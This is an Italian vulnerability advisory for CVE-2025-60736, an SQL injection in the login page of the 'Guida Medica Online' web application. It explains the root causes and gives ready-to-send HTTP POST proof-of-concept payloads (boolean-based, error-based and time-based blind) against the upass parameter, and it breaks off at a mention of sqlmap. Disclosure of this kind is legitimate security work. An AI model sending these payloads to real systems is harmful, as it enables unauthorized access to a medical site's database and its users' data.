CVE-2025-60736: Vulnerabilità di SQL Injection nella Guida Medica Online
Riepilogo Esecutivo
Questo documento descrive una vulnerabilità critica di SQL injection scoperta nell'applicazione web Guida Medica Online. La vulnerabilità consente un accesso non autorizzato al database e comporta rischi significativi per la sicurezza dell'applicazione e dei suoi utenti.
La vulnerabilità deriva da una validazione e sanificazione insufficiente dell'input nel file /login.php. L'applicazione concatena direttamente l'input dell'utente dal parametro upass nelle query SQL senza una sanificazione adeguata o istruzioni preparate.
Causa Principale Tecnica:
Concatenazione diretta di stringhe nelle query SQL
Mancanza di validazione e sanificazione dell'input
Implementazione mancante di istruzioni preparate
Binding dei parametri insufficiente
3. Prova di Concetto
Posizione della Vulnerabilità
File: /login.php
Parametro: upass (POST)
Vettore di Attacco: Manipolazione della richiesta HTTP POST
Metodi di Sfruttamento
Metodo 1: SQL Injection Basata su Booleani
root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
uname=uLnf&upass=rZgo' OR NOT 1852=1852-- iPRx
Metodo 1: SQL Injection Basata su Errori
root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
uname=uLnf&upass=rZgo' AND EXTRACTVALUE(4672,CONCAT(0x5c,0x7176707071,(SELECT (ELT(4672=4672,1))),0x71717a7071))-- knKp
Metodo 2: SQL Injection Blind Basata sul Tempo
root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
uname=uLnf&upass=rZgo' AND (SELECT 2089 FROM (SELECT(SLEEP(5)))zUlY)-- mWfa
Test Automatici
La vulnerabilità è stata confermata utilizzando sqlmap: